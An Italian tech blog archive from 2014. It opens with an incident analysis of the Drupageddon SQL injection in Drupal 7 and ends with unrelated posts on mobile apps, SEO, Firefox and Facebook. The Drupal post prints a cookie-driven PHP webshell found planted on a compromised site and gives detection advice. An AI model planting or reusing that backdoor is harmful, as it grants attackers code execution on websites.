giovedì 16 ottobre 2014

Grave vulnerabilità Drupal (Drupageddon) SA-CORE-2014-05


Ieri è stato reso pubblico un grave problema di sicurezza per il CMS Drupal 7 per il quale stanno già girando dei Proof of Concept ed anche degli script che sfruttano tale vulnerabilità.

La nuova vulnerabilità di Drupal (DRUPAL-SA-CORE-2014-05, CVE-2014-3704) chiamata anche con gli hashtag #drupageddon e #drupalsa05, si può sfruttare in ogni installazione Drupal 7 precedente alla versione 7.32 o nelle installazioni non opportunamente corrette con la semplice patch già disponibile online.

Attraverso la nuova vulnerabilità di Drupal è possibile accedere direttamente al database ed eseguire codice PHP arbitrario.

Il bug di sicurezza è gravissimo in quanto può essere sfruttato da remoto in maniera completamente anonima. Basta costruire una richiesta HTTP ad hoc contenente praticamente una SQL injection.

Questa mattina, mentre aggiornavo moltissimi siti sviluppati con Drupal 7, ho identificato un sito che era già stato preso di mira ed ho analizzato un esempio di possibile attacco tra quelli in corso durante queste ultime ore.

In questo specifico caso il bug è stato usato per inserire all'interno del database un nuovo "menu_router", ovvero un indirizzo a cui Drupal risponde chiamando una funzione.

Solitamente Drupal utilizza questo meccanismo per generare le pagine, mentre l'attacco in questione ha inserito una funzione che a sua volta genera un file php contenente uno script che recupera dei cookie (probabilmente contenente dei nuovi comandi) e li esegue.

Il comando inserito nel database e che risponde al nuovo percorso virtuale è file_put_contents().

Come parametro è stata impostata una stringa che, convertita in testo leggibile, contiene il nome del file da scrivere, in questo caso "modules/field_ui/lqns.php", ed il contenuto del file:

<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();"

Ho provato a cercare in rete se c'era qualche riferimento a proposito, ma non ho trovato ancora nulla, evidentemente è troppo presto.

EDIT 16/10/2014 ore 19:30: Anche Josh Koenig, uno sviluppatore Drupal, ha rilevato questo stesso comportamento ed ha pubblicato una stringa analoga che, nel suo caso, scrive un file in un diverso percorso: "modules/syslog/rphb.php".

Arrivato a questo punto mi sono dovuto fermare con l'analisi perché non ho la possibilità di approfondire ulteriormente il contenuto dei cookie e scoprire che genere di comandi sono eseguiti in quanto non vengono salvati nei log.

EDIT 17/10/2014 ore 9:00: È stato reso pubblico un altro sistema per ottenere lo stesso risultato in maniera più "nascosta". Al posto di creare un file ed agganciarlo ad un path virtuale, metodo facilmente rilevabile analizzando i file del CMS per identificare file modificati o nuovi file, è possibile sovrascrivere un percorso di sistema di Drupal, ad esempio "/user" ed impostare l'access_callback alla funzione php_eval() che eseguirà il codice trasmesso tramite una POST.


Questo problema mi preoccupa moltissimo perché nel database potrebbero essere nascoste altre insidie e non sarà facile rilevarle.

Come scoprire se il sito è stato bersaglio di un attacco?

Per prima cosa, dopo aver applicato la patch (http://goo.gl/cQ39uD) o aggiornato a Drupal 7.32, bisogna verificare che non siano stati creati nuovi account utente e che gli account esistenti non siano stati compromessi. Se si ha qualche sospetto conviene aggiornare le password e verificare le impostazioni delle email abbinate agli account di sistema. Al momento non sono noti problemi di questo genere, ma ciò non è una buona scusa per sentirsi al sicuro.

Successivamente andrebbero verificati tutti i file del CMS controllandone l'integrità. Se si usa "git" per il versioning/deploying del sito si può già effettuare un primo rapido controllo.

Altrimenti si possono verificare i checksum dei file di Drupal core e dei moduli contrib confrontandoli con quelli ufficiali. Mentre, per quanto riguarda moduli, e temi per Drupal o altri file personalizzati potrebbe essere necessario un controllo manuale.

Si potrebbe cominciare identificando i file creati negli ultimi N giorni usando il comando "find":

find -ctime -N

E quelli modificati negli ultimi N giorni con il parametro "mtime":

find -mtime -N

Andranno quindi analizzati i log del webserver per rilevare accessi ad indirizzi non esistenti ma che non ritornano un errore 40x.

Va anche controllato il contenuto del database, ad esempio verificando la tabella users e la tabella menu_router (vedi gli esempi descritti).

Aggiornare o applicare la patch al più presto!

Infine consiglio a tutti coloro che possiedono siti web sviluppati con Drupal 7 di aggiornarli entro breve e procedere con una analisi del sistema per verificare che non sia già stato compromesso.

giovedì 11 settembre 2014

App per ridimensionare immagini e qualità del software


Oggi stavo cercando un software da installare nello smartphone per ridimensionare delle foto ma sono rimasto molto deluso da questa esperienza.

Dopo una decina di minuti passati a cercare un'app specifica per questo scopo ho trovato solo delle soluzioni amatoriali e di bassa qualità.

Ecco le prime quattro che ho provato:
  • Image Shrink Lite - non permette di fare il resize di più file contemporaneamente e l'interfaccia è decisamente grossolana.
  • Immagini resizer facile - già a partire dalla traduzione fatta con Google Translator l'app è chiaramente di scarsa qualità. Stessi problemi della precedente.
  • Resize me! - Idem come sopra.
  • Photo Resize - Provate ad indovinare...
Non mi sono dato per vinto e così ho cercato delle applicazioni generiche per la modifica delle immagini sperando di trovare qualcosa di più interessante.

Tra queste ho trovato alcuni programmi molto famosi in rete: Snapseed, Pixlr Express della Autodesk e Adobe Photoshop Express.

Leggo le descrizioni, ricche di funzionalità (molte dalla dubbia utilità), ma nessuna traccia di ridimensionamento delle immagini. Provo anche a cercare con Google e non trovo alcun riferimento a tale funzionalità.

Faccio un tentativo e le installo una ad una.

Effettivamente scopro che nessuno di questi tre software è in grado di ridimensionare una foto, o perlomeno non riesco a trovarne il modo.

Procedere "a tentativi" mi sta stancando ma finalmente, dopo ulteriori ricerche, trovo un'app che, secondo alcune recensioni, dovrebbe avere questa funzionalità.

Da questo punto l'esperienza è stata ancora più irritante.

L'app in questione è Aviary Photo Editor, ma dopo averla installata, si è rivelato l'ennesimo programma inutile.

Dopo aver eseguito l'applicazione e selezionato una foto da modificare ho ricevuto una prima proposta pubblicitaria.

Cominciamo bene.

Già che c'ero ho giocato con qualche effetto, tonalità seppia, bordino colorato, effetto meme, colori desaturati. Nel mentre mi becco qualche altra pubblicità e proposte di acquisto per plugin a pagamento...

...ma del resize nessuna traccia.

Chiudo l'app e la disinstallo.

Avevo una ventina di minuti di pausa e li ho sprecati inutilmente.

Nel frattempo sono nuovamente davanti alla workstation, trasferisco i file e con un semplice "mogrify -resize 1024x768 *.jpg" risolvo elegantemente il problema:


Ancora una volta ho avuto la conferma di come tutta questa marea di applicazioni per le piattaforme mobile sia solo uno specchietto creato allo scopo di:
  • Acquisire dati personali degli utenti.
  • Proporre costosi acquisti in-app.
Vista la mia opinione, probabilmente non faccio parte del pubblico a cui questi software sono dedicati.

Il numero di applicazioni per le nuove piattaforme mobile Android e iOS è enorme, ma a che cosa servono milioni di app se poi la loro qualità è scadente?

In molti casi, che siano app gratuite, a pagamento o freemium, si tratta di software programmato senza un briciolo di attenzione all'usabilità, all'efficienza e che non offre un'esperienza d'uso che soddisfi realmente le esigenze degli utenti.

A volte mi chiedo se questo sia lo specchio di una carenza di professionalità e competenza da parte degli sviluppatori, magari improvvisati, oppure se sia semplicemente la naturale risposta alle richieste del mercato e del pubblico che non è in grado di valutare la qualità del software ed il cui uso degli strumenti tecnologici è estremamente superficiale.

lunedì 1 settembre 2014

A che punto siamo con Drupal 8?


Drupal 8 è la prossima versione del CMS Drupal. Chi sviluppa siti web con questo strumento è già da diverso tempo che sente parlare dell'ottava versione, ma come spesso accade nei progetti Open Source, la data di rilascio è fissata ad un imprecisato "quando sarà pronto".

Quando sarà pronto Drupal 8?

Per vedere il rilascio di Drupal 8 bisognerà attendere che il numero di bug (in particolare quelli critici) sia azzerato.

Due anni fa si stimava che il software fosse pronto entro l'estate del 2013 in concomitanza della conferenza DrupalCon Europe. Un anno e mezzo dopo, all'inizio del 2014, sembrava che la data prevista fosse entro la fine del 2014, ma per come stanno andando le cose ritengo che saranno rilasciate al massimo alcune versioni beta.

Ad oggi è infatti aperto solo un bug di tipo "beta blocker", quindi immagino che la prima beta sia pronta nel giro di qualche settimana.

Anche se nei prossimi mesi potrebbero essere pubblicate versioni stabili da un punto di vista di nomenclatura, temo che non lo saranno dal punto di vista pratico.

Spero vivamente di sbagliarmi ma l'andamento della chiusura dei problemi rilevati e segnalati nella piattaforma di gestione bug non è tanto rassicurante.

Basti pensare che nell'ultimo anno sono stati chiusi una quarantina di bug critici e ne rimangono ancora un centinaio (37 su 140 se non ho fatto male i conti). Ne sono stati aperti quasi 300 di "maggiori" ed altrettanti di "normali". In totale il numero di bug non risolti identificati come "maggiori" è di quasi 650, mentre il numero di segnalazioni normali ancora da correggere è di oltre cinquemila.

Non è solo questione di "core"

Anche ammettendo che Drupal 8 core, ovvero il cuore del CMS, sia pronto entro la fine del 2014, rimane aperta la questione dei moduli "contrib". Si tratta di tutti quei "plugin" che estendono ed arricchiscono le funzionalità del CMS, completandolo e rendendolo un pacchetto usabile per la creazione di siti e servizi web professionali.

Molti di questi moduli "contrib" sono essenziali per poter realizzare un sito web completo senza dover sviluppare moltissimo codice da zero.

Purtroppo la maggior parte dei moduli non ha nemmeno una versione in fase di sviluppo per Drupal 8.

Inoltre alcuni moduli di terze parti dipendono da altri moduli. Se quelli principali non saranno portati su Drupal 8, i moduli che dipendono da loro potrebbero avere seri problemi di sviluppo.

Penso poi ad altri moduli fondamentali come ad esempio il modulo Metatag che addirittura non è ancora stabile per Drupal 7 (è stata rilasciata una versione RC neanche un mese fa), e che ha causato non pochi grattacapi negli ultimi anni. I programmatori di questo modulo, giustamente, aspettano di vedere come sarà Drupal 8 prima di cominciare il porting.

Provare Drupal 8

Si può testare Drupal 8 scaricandolo dal sito ufficiale drupal.org. Consiglio di scaricare il pacchetto "alpha" e non il codice dal repository GIT perché è troppo instabile e si rischia di scaricare una versione non funzionante.

Da un punto di vista tecnico è molto interessante provare il core ed i moduli contrib in fase di sviluppo per fare degli esperimenti o per contribuire al testing ed allo sviluppo di Drupal 8 e dei moduli.

Schermate con errori e crash improvvisi sono in agguato ad ogni click, quindi si raccomanda di provare Drupal 8 con la consapevolezza che si sta provando del codice in via di sviluppo.

In ogni caso, nei prossimi mesi proverò nuovamente a sviluppare qualche semplice sito per prendere confidenza con le numerose novità introdotte. Sotto la scocca c'è stata una notevole evoluzione, sia per quanto riguarda lo sviluppo di moduli che per la creazione di temi.

Sono state risolte molte problematiche del passato soprattutto per quanto riguarda la sua adozione in ambito aziendale.

Dopo aver assaggiato tutte le novità di Drupal 8 sono sempre più impaziente: il CMS in una decina di anni si è trasformato da un sistema amatoriale ad un prodotto professionale e completo che può soddisfare moltissime esigenze in ambito di sviluppo web.

Previsioni per il futuro rilascio di Drupal 8

Drupal 8.0 verrà rilasciato quando tutti i bug e le attività critiche saranno risolti. Sono 103 nel momento in cui scrivo. Tutti gli altri problemi saranno sistemati con le successive versioni.

Come anche per le precedenti release, il CMS avrà quindi bisogno di almeno sei/dodici mesi per essere stabilizzato e, nel frattempo, verranno sviluppati i principali moduli aggiuntivi.

I primi progetti in Drupal 8 potrebbero quindi vedere la luce già nel corso del 2015.

EDIT 02/11/2015: Dopo un anno la situazione è ancora piuttosto instabile. Se la data ufficiale del 19 novembre 2015 sarà rispettata Drupal 8 potrebbe essere usabile verso la metà del 2016 in quanto servirà un po' di tempo prima che i principali moduli siano pronti.

sabato 30 agosto 2014

Appunti SEO: Author Rank e Authorship

Dopo un paio di giorni dall'inaspettata eliminazione di Google Authorship, ecco un'analisi della sua correlazione con l'Author Rank.

L'autore di una pagina influisce nel posizionamento su Google?

Author Rank

L'Author Rank è stato studiato e commentato da molti esperti del settore in seguito alle dichiarazioni di Google relative all'importanza sempre più consistente dell'autorevolezza degli autori che pubblicano contenuti sul web.

Il termine «Author Rank» è stato usato per indicare la possibilità, non la certezza, che il motore di ricerca Google dia un peso diverso alle pagine web mostrate nella SERP in base all'autore.

La maggior parte dei parametri su cui si basa questo potenziale fattore di posizionamento ruotano attorno al social network Google+ e teoricamente sono i seguenti:
  • numero di persone che seguono l'autore;
  • numero di condivisioni dei post;
  • numero di +1 ottenuti;
  • numero di commenti e di post;
  • frequenza di pubblicazione dei commenti e dei post.

Authorship

Per poter associare questi parametri ai contenuti delle pagine web è stato introdotto il concetto di Authorship. Sembra però che qualcosa sia andato storto e quindi ecco la decisione di non usare più questo collegamento manuale tra pagina web e profilo Google+.

Anche senza Google Authorship, i contenuti pubblicati su Google+, le informazioni legate alle condivisioni, i +1 e tutti gli altri parametri possono essere comunque identificati ed usati per determinare l'autorevolezza degli autori (perlomeno all'interno del social Google+).

Ma se nei siti web il collegamento verso l'autore attraverso il tag rel="author" non viene più considerato (così pare), Google dovrà usare altri metodi per associarlo all'eventuale profilo Google+ e quindi sfruttare i dati in suo possesso per generare una SERP che tenga conto di tali parametri.

Google ed il dopo-authorship

Riassumendo, l'Author Rank dovrebbe servire per stabilire quanto gli autori possono avere una certa influenza nella generazione della SERP, mentre Authorship serviva a Google per gestire facilmente l'associazione autore-contenuto.

Come scrivevo anche nell'articolo di ieri (Approfondimento SEO sulla fine di Google Authorship) i motivi per cui è stato abbandonato questo sistema possono essere molteplici.

Molto probabilmente il meccanismo non è funzionato bene come ci aspettava ed è plausibile che gli algoritmi del motore di ricerca siano comunque abbastanza sofisticati da rendere inutile una forzatura manuale per correlare gli autori ai loro contenuti.

Inoltre non è assolutamente certo che Google usasse (ed usi) tali dati per i risultati delle ricerche. Tra l'altro, se effettivamente l'Author Rank fosse reale, non dovrebbe comunque essere un fattore dominante visto che sarebbe solo uno degli innumerevoli parametri usati dal motore di ricerca ed un suo peso eccessivo potrebbe sbilanciare la validità delle SERP.

Considerazioni finali su Author Rank, Authorship e SEO

Va ricordato che ai fini del posizionamento, e più in generale per ottenere dei risultati ottimali in ambito di visibilità e web marketing, il fattore principale è la qualità dei contenuti e di come essi sono comunicati.

Da un lato sono proprio questi fattori che influiscono maggiormente sulla condivisione e sull'apprezzamento dei contenuti, aumentandone la visibilità in maniera naturale.

Dall'altro sarà compito di Google stabilire il peso che hanno le azioni (e le interazioni) sociali nel momento in cui genera una SERP per una specifica ricerca effettuata da un singolo utente.

Nel corso degli anni, il modo in cui il motore di ricerca Google propone i risultati è cambiato e cambierà ancora con l'evolversi delle esigenze e delle aspettative dei propri utenti, dovendo restituire sempre risultati pertinenti, precisi ed utili.

Fornire risposte provenienti da fonti autorevoli è uno dei tanti modi per offrire un servizio migliore. Quindi, anche in mancanza di un comunicato stampa ufficiale, è facile intuire come l'analisi delle fonti e del comportamento degli utenti, in relazione ai contenuti ed ai rispettivi autori, verrà comunque tenuta in considerazione.

Aggiornamento del 01/09/2014: Per completezza voglio aggiungere un video di Matt Cutts dove appunto si parla della possibilità di come l'analisi degli autori potrebbe essere un modo molto interessante per fornire dei risultati sempre più accurati.

venerdì 23 maggio 2014

Tablet e smartphone sorpassano il PC per navigare su internet



L'uso dei tablet e degli smartphone per la navigazione dei siti internet è in crescita costante.

Già lo scorso anno aveva raggiunto quote molto elevate, soprattutto in siti di informazione e blog.

Ho analizzato diversi siti web di questo tipo ed i risultati sono molto simili con differenze entro i 10 punti percentuali, può sembrare un parametro elevato ma è più che sufficiente per confermare l'andamento.

All'inizio del 2013 la media degli utilizzatori di tablet ed altri dispositivi mobile era attorno al 30% contro un 70% di chi usava il tradizionale PC (desktop/notebook) per la navigazione.

In questa prima metà del 2014 le cifre relative al mobile sono praticamente raddoppiate: del campione analizzato circa il 60% degli utenti che navigano utilizzano un dispositivo mobile.

Ecco un esempio di un sito con un campione di poco inferiore ai tre milioni di sessioni al mese:


Ovviamente questi dati non sono da ritenersi validi per tutti i siti web, ad esempio siti come forum o siti web molto specializzati hanno ancora un largo bacino di utenti desktop che però è in diminuzione.

Per questa seconda tipologia di siti web che ho analizzato, nel 2013 sono state registrate percentuali attorno al 95% desktop e 5% mobile, oggi gli stessi siti riscontrano dati ben diversi: 70-80% desktop, 20-30% mobile.

Questi dati confermano ancora una volta volta il cambiamento delle abitudini degli utenti. Pertanto anche il web si deve evolvere per soddisfare le nuove esigenze: è indispensabile che i siti web siano progettati e sviluppati considerando il mondo degli smartphone e dei tablet.

giovedì 22 maggio 2014

La definizione di SEO

Dare una risposta precisa alla domanda «Qual è la tua definizione di SEO» non è facile.

Volevo rispondere in poche righe al quesito di Andrea Pernici ma non ci sono riuscito e quindi mi sono trovato a scrivere questo post.

Una definizione precisa di SEO?

Non credo esita realmente una definizione universale per definire l'acronimo SEO. Ogni professionista dispone di un proprio bagaglio di esperienze che gli permette di affrontare ed analizzare la questione in maniera differente dagli altri. Di conseguenza esistono numerose interpretazioni, molto spesso condivisibili e sicuramente valide.

SEO in italiano

Ma partiamo dal primo punto (o spunto) di riflessione. SEO è un acronimo inglese che indica «Search Engine Optimization», ma come si traducono queste parole in italiano? La traduzione corretta è «ottimizzazione [dei siti web] per i motori di ricerca» oppure «... nei motori di ricerca»?

Ovvero, si ottimizza il sito web in modo che il motore di ricerca lo visualizzi per primo senza occuparsi dei contenuti e della qualità del sito nei confronti degli utenti, oppure lo si ottimizza in modo che gli utenti lo trovino come interessante già a partire da quando appare nei motori di ricerca (possibilmente ai primi posti)?

In passato, probabilmente, la prima accezione era quella più diffusa.

La SEO era vista principalmente come lo studio e l'applicazione continua di accorgimenti e trucchi necessari per raggiungere le prime posizioni, solitamente su Google, sfruttandone l'algoritmo di ricerca e concentrandosi sugli aspetti tecnici/tecnologici e trascurando, di fatto, gli utenti.

La convergenza tra SEO e web marketing

Nel corso del tempo, con l'evoluzione degli algoritmi di ricerca e degli stessi utenti della rete, la SEO ha assunto nuovi significati, affiancando ed integrandosi alle diverse strategie di web marketing.

Oggi chi si occupa professionalmente di SEO non considera solamente l'ambito tecnologico, ma tiene conto anche degli utenti, delle loro relazioni ed interazioni in modo da contribuire positivamente alla esperienza d'uso del web.

Quindi la definizione di SEO in italiano la estenderei dalla traduzione iniziale in qualcosa del genere:

«SEO - Tutte le attività di ottimizzazione tecnica dei siti web e delle modalità di comunicazione dei contenuti, mirate a facilitare il compito dei motori di ricerca nel fornire i risultati più pertinenti in base alle necessità degli utenti.»

La visione SEO

Voglio concludere sottolineando che la SEO non è convincere Google che un certo sito web deve essere primo, magari perchè la keyword density è all'interno di determinati parametri o perché ci sono migliaia di link in ingresso.

SEO significa avere una visione più ampia che spinge il professionista a considerare tecnologia e comunicazione come due strumenti complementari ed indispensabili per ottenere dei risultati attraverso il web.

In base alle proprie esperienze, conoscenze e competenze ci sarà chi cerca di operare nell'ambito più prettamente tecnico e chi ad un livello più commerciale (o di comunicazione). Ma in ogni caso tecnica e contenuti non si escludono a vicenda.

lunedì 5 maggio 2014

Mozilla Firefox: nuova versione + grafica aggiornata

Oggi ho installato la nuova versione del browser Firefox che ha raggiunto il ventinovesimo rilascio stabile.

Interfaccia grafica Australis Mozilla Firefox 29
Interfaccia grafica Australis Mozilla Firefox 29

Sto cercando di capire se sono stati apportati dei reali miglioramenti oppure se le novità non sono significative.

Secondo le note di rilascio Firefox 29 porta con sé due particolari novità:
  1. Nuova versione per Firefox Sync
  2. Nuova interfaccia utente Australis
La nuova versione di Firefox Sync utilizza il sistema Firefox Account per tenere sincronizzate più istanze del browser. Utile nel caso si usino più dispositivi e si desideri avere sempre aggiornate le password, i segnalibri, la cronologia ed addirittura le schede aperte.

A proposito delle schede aperte, non ho mai testato questa funzionalità ma sono proprio curioso di provare come funziona la sincronizzazione delle schede nel caso in cui ci siano due finestre Firefox nel PC, ognuna con più tab, ed una istanza di Firefox aperta in un altro dispositivo, ad esempio in un tablet.

Non usando Firefox Sync, questa funzionalità non mi interessa, passiamo quindi alla seconda importante feature di Firefox 29, l'interfaccia utente Australis.

Per quanto riguarda la nuova UI i commenti sul web sono spaccati in due: come al solito c'è chi sta apprezzando moltissimo le novità grafiche e chi invece rivuole la vecchia versione.

PRO Firefox 29

I promotori della nuova interfaccia la descrivono come più elegante, razionale e compatta. Graficamente ricorda molto Google Chrome e visto il successo di quest'ultimo la somiglianza è vista come un punto di forza.

La possibilità di personalizzare l'interfaccia è un altro punto forte della nuova versione.

CONTRO Firefox 29

La stessa interfaccia è invece ritenuta come poco razionale e accusata di occupare troppo spazio da parte di un'altra fetta di utenti. I quali vedono nella somiglianza con Google Chrome un difetto e sottolineando come la differenza da questo browser fosse una caratteristica importante per la scelta tra i due. Ora che sono graficamente molto simili, gli utenti non hanno, apparentemente, un semplice metro di giudizio per scegliere tra i due.

Inoltre l'alto livello di personalizzazione tanto decantato nelle note di rilascio non è effettivamente così elevato, anzi: in alcuni casi delle funzionalità sembrano essere state rimosse.

La verità sta nel mezzo

Sinceramente non trovo il nuovo aspetto così sconvolgente, anche se non mi sarebbe dispiaciuto un'interfaccia leggermente più compatta, dove per "compatto" non intendo "con meno cose", ma con un uso più razionale degli spazi.

Ad esempio lo spazio dedicato alle schede potrebbe essere ridotto leggermente, mentre l'area cliccabile per il pulsante ricarica/ferma poteva essere un po' più grande.

Anche il pannello di personalizzazione del layout non è molto intuitivo e funzionale, inoltre mi è già crashato un paio di volte.

Tutti dettagli che dimostrano come si tratti di un software in continua evoluzione e con ampi margini di miglioramento: alcuni aspetti sono stati effettivamente migliorati, ma molti altri sembrano ancora immaturi.

Probabilmente un altro po' di beta testing non sarebbe stato una brutta idea.

Comunque il risultato è piacevole e moderno, l'uso quotidiano non è particolarmente influenzato dai piccoli problemini riscontrati. Basterà un po' di messa a punto per ottenere dei risultati ancora migliori.

sabato 3 maggio 2014

Ennesimo errore nelle notizie Ansa

Il sito dell'Ansa, come molte altre testate giornalistiche, spesso riporta notizie con grossolani errori di battitura e di ortografia.

Ieri sera l'ennesimo errore ha toccato un argomento piuttosto delicato, dove una «strage» è stata trasformata in delle «strade».

Fortunatamente questa volta l'errore è stato corretto, ma sono riuscito ad immortalare la schermata in tempo:

Screenshot del sito Ansa
Errore in prima pagina

Visto che non si tratta di una notizia di poco conto, mi aspetterei che gli addetti alla pubblicazione delle notizie da prima pagina stessero un po' più attenti.

Posso capire che ci possano essere delle sviste in trafiletti per argomenti di secondo piano, ma per commettere uno sbaglio del genere significa che c'è qualcosa che non va.

Non è mia intenzione giudicare negativamente gli operatori ed i giornalisti, ma data la frequenza con cui noto questi errori voglio porre l'attenzione sul processo di creazione, revisione e pubblicazione dei contenuti.

Quale può essere la causa di tali errori?

Chi scrive questi titoli non è in grado di rileggere prima di salvare e pubblicare?

E se chi scrive commette un errore, può capitare anche ai migliori, non c'è nessuno che effettua una revisione dei testi prima della pubblicazione?

Probabilmente, le procedure adottate dall'agenzia non sono sufficienti per evitare di commettere questi errori.

Cosa si può fare per arginare il problema e ridurre la pubblicazione di testi errati in un sito web?

Basterebbe sviluppare un sistema che permetta la pubblicazione dei testi solo dopo una approvazione da parte di un team di revisione. Sviluppare un meccanismo di questo tipo è piuttosto facile e più di qualche volta l'ho integrato nei siti web dei miei clienti.

Questo sistema ha solo un punto critico: quando entrambi gli operatori (chi scrive e che revisiona) compiono lo stesso errore.

venerdì 2 maggio 2014

Il mio sito non è più primo su Google!

Più di qualche volta sono stato contattato da aziende che si lamentano delle scarse performance dei loro siti web.

Mentre qualche anno fa erano presenti nei primi posti su Google, oggi si trovano in posizioni molto basse.



A queste aziende chiedo:

«Durante questi anni, che cosa è stato fatto per evitare il naturale declino del sito?».

«Sono state svolte attività SEO e campagne di promozione online?».

Solitamente la risposta a queste domande è negativa.

Puntare i riflettori sulla mancata cura del sito web dovrebbe essere un segnale piuttosto chiaro per far capire che un sito deve essere mantenuto in vita con azioni specifiche.

Invece molte volte le aziende faticano a rendersi conto dell'importanza di una strategia continuativa. Capita spesso nelle piccole realtà dove si spera di ottenere dei risultati garantiti a fronte di un misero investimento "una tantum".

Il posizionamento di un sito web non è costante ma può variare.

Il posizionamento dipende da moltissimi fattori, pertanto è necessario mettere in atto una strategia che comprenda almeno i seguenti punti di intervento diretto nel sito:
  • Monitoraggio delle performance del sito.
  • Aggiornamento dei contenuti.
  • Aggiornamenti tecnologici per mantenerlo al passo con i tempi.
Per attuare una campagna di web marketing completa gli interventi on site dovranno essere affiancati da attività fuori dal sito web stesso come l'invio di campagne email piuttosto che l'uso dei circuiti pubblicitari (Pay Per Click o Pay Per View) o la promozione tramite i social network.

Ma allora che cosa ottengo (e quanto guadagno) investendo tot euro?

Dopo aver illustrato ai clienti la necessità di lavorare su più fronti, arriva la classica domanda: «Concretamente, se spendo tot euro, che cosa ottengo?». Oppure: «Quanto costa ottenere questo volume di vendite per il mio ecommerce?».

Costo X = Risultato ?

Rispondere a questo genere di domande non è mai facile. Sarebbe troppo bello avere una formula magica per sviluppare un sistema che spendendo X permetta di far guadagnare Y in tutta sicurezza.

Quindi va spiegato che per ottenere dei risultati sul web è necessario investire in un piano a lungo termine. Lavorare sulla reputazione del marchio, ottimizzare il sito web, creare contenuti che possano attirare gli utenti, coinvolgere gli utenti...

Inoltre, per promuovere un'azienda, dei prodotti o dei servizi attraverso il web, serve anche impegno e collaborazione da parte del committente. Non basta pagare qualcuno per far vendere il proprio prodotto. Sarebbe troppo facile!

Arrivati a questo punto si comincia a capire come mai il budget per una campagna di promozione efficacie debba essere coerente con gli sforzi per raggiungere gli obiettivi prefissati.

Ai clienti indecisi o timorosi di spendere soldi inutilmente consiglio di cominciare con un test che sia poco rischioso. Investire un po' alla volta è una soluzione equilibrata che consente di avere una visione più precisa di quali possono essere le prospettive di crescita.

giovedì 17 aprile 2014

Ricerca di informazioni su Facebook: missione impossibile!

La bacheca degli utenti Facebook è costantemente aggiornata con nuovi contenuti, messaggi, video, foto e collegamenti ad altri siti.

Ma cosa succede se si vuole cercare uno specifico contenuto ma non ci si ricorda chi e quando l'aveva condiviso?

Il problema non si può risolvere in maniera facile perché al momento manca la funzionalità di ricerca dei post.

Anche se nella documentazione di Facebook è gia indicata la funzionalità di ricerca tra le connessioni, il "Graph Search", questa in realtà non è ancora stata attivata per la gran parte degli utenti, che quindi possono solamente cercare le persone, i gruppi, gli eventi, i luoghi, le applicazioni o le pagine.


Istruzioni Facebook per cercare un post tra le connessioni.


Il flusso di informazioni pubblicate su Facebook è molto rapido e l'algoritmo di Facebook non mostra sempre gli stessi post (e nello stesso ordine).

Ad oggi l'unico modo di trovare un post è quello di selezionare l'ordinamento delle notizie a partire dalle più recenti e scorrere in basso fino a trovare il post che si stava cercando.

Questa mancanza di funzionalità rende Facebook un social network decisamente limitato.

La disorganizzazione delle informazioni e l'impossibilità di effettuare una ricerca in modo veloce sono fattori che penalizzano fortemente Facebook.

Ciononostante molte aziende usano le proprie pagine Facebook per dialogare con i propri contatti, usandole come una sorta di bacheca pubblica per il servizio clienti.

Una accozzaglia ingestibile di commenti e risposte sparsi per i vari post e di conseguenza senza una reale utilità.

Da un lato utenti che non si rendono conto di usare un sistema inefficiente ed inaffidabile, dall'altro aziende che hanno male interpretato le finalità dello strumento.

Staremo a vedere se in seguito all'introduzione del "Graph Search" verranno rese disponibili anche funzionalità più valide anche per un utilizzo di tipo professionale della piattaforma.

mercoledì 16 aprile 2014

Pubblicità online troppo invadente

Una delle forme di pubblicità online che si trova sempre più spesso nei siti web è il banner a pieno schermo posizionato davanti ai contenuti del sito.

Si tratta di una forma di pubblicità decisamente invasiva che in alcuni casi potrebbe influire in maniera molto negativa sulla navigabilità del sito.

Questi banner sono spesso sviluppati con tecnologia Flash e nel caso in cui il plugin Flash sia disabilitato la navigazione del sito diventa quasi impossibile.

Oggi è il caso del sito dell'Ansa:

Banner Flash a piena pagina
Esempio di banner in Flash con il plugin disabilitato

Il caso estremo: plugin Flash disabiltato

Come si può vedere nello screenshot l'utente ha due modi per chiudere il banner:
  1. Attivare temporaneamente il plugin flash ed usare la funzionalità di chiusura che è stata prevista da chi ha progettato il banner.
  2. Chiudere il contenuto Flash cliccando sulla X in alto a destra.
La seconda opzione ha però un grosso problema: l'oggetto Flash è innestato all'interno di un elemento HTML che non scompare dopo aver chiuso il contenitore Flash, pertanto si potrà vedere la home page del sito ma senza poter cliccare alcun link (a meno che non si intervenga manualmente tramite Firebug, opzione poco pratica).

In alternativa basta ricaricare alcune volte la pagina in modo che il banner non venga più mostrato. Fortunatamente questo tipo di banner è studiato per non essere visibile ad ogni visita.

La casistica descritta è comunque estremamente rara in quanto il numero di utenti che blocca il plugin Flash è poco rilevante, pertanto non è considerata da chi implementa questo tipo di pubblicità.

Quanto vale un banner a pieno schermo?

Una pubblicità a piena pagina, mostrata al posto del sito web che si desidera navigare, quanto influisce nel rapporto tra l'utente ed il sito?

Ovviamente la risposta dipende da molti fattori: le finalità del sito, la tipologia di utenti ecc.

In ogni caso un banner così invadente distrae l'utente dalla navigazione e ciò potrebbe avere un effetto controproducente: infastidire l'utente e facendolo uscire dal sito.

A questo punto starà al proprietario del sito stabilire se vale di più un utente nel proprio sito oppure se vale di più la pubblicità, con i suoi pro ed i suoi contro.

Nei siti con una visibilità molto alta, come quelli di informazione, questo tipo di pubblicità permette di ottenere dei ricavi decisamente elevati, a discapito di una piccolissima percentuale di utenti "scontenti".

Infine va considerato che dal punto di vista "promozionale", questi spazi hanno un ottimo riscontro, perlomeno in linea teorica.

La loro portata è molto estesa e la probabilità di click, occupando il massimo spazio disponibile nella pagina, aumenta di conseguenza. In questo modo ci si assicura un CTR consistente e, per la legge dei grandi numeri, si dovrebbero ottenere molte più conversioni rispetto ad un banner pubblicitario di dimensioni più contenute.

lunedì 31 marzo 2014

Quanti hashtag per Facebook? Massimo 30!

Vi siete mai chiesti quanti hashtag si possono usare in un singolo post su Facebook?

La documentazione di Facebook non risponde direttamente a questa domanda ed anche cercando su Google non ho trovato riferimenti validi. Però basta fare un semplice test e si scopre subito la risposta.

Il numero massimo di hashtag che si possono usare nello stesso post su Facebook è di trenta (30).

Cercando con più attenzione nella documentazione si trova solo un riferimento a questo limite, ma in relazione ad Instagram.

Il limite di hashtag è valido sia per le foto che i post tradizionali. Superato il trentesimo hashtag, i successivi non sono più considerati come tali.

Esempio di hashtag su Facebook: limite a massimo trenta hashtag

Quali sono le implicazioni di questo limite?

